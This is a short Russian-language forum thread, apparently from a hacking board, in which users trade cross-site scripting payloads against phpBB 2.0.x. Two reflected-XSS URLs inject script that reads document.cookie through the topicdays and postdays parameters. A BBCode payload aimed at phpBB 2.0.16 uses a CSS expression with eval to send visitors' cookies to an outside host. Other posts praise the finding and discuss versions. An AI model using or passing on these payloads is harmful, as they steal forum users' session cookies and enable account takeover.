2 xss увидел в viewforum.php и viewtopic.php

viewforum.php?f=1&topicdays=99"><script>alert(document.cookie)</script>&start=30

viewtopic.php?t=10&postdays=99"><script>alert(document.cookie)</script>&start=20
...

Хехе. Ради инетереса ты смотрел на какой версии тестировал + почему не написал в каких браузерах пашет а в каких нет? А так молодец! За старания свои + заслужил.

в эксплорере делал, а тестил на своём 2.0.6 форуме

в эксплорере делал, а тестил на своём 2.0.6 форуме
phpBB 2.0.6: Выпущена в 2002 редкая версия.
А если phpBB 2.0.16 [*color=#EFEFEF][*url]www.ut[*url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(th is.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]

Вообще-то уже 2.0.21 на дворе =)

DIAgen извеняюсь 2.0.16, не увидел.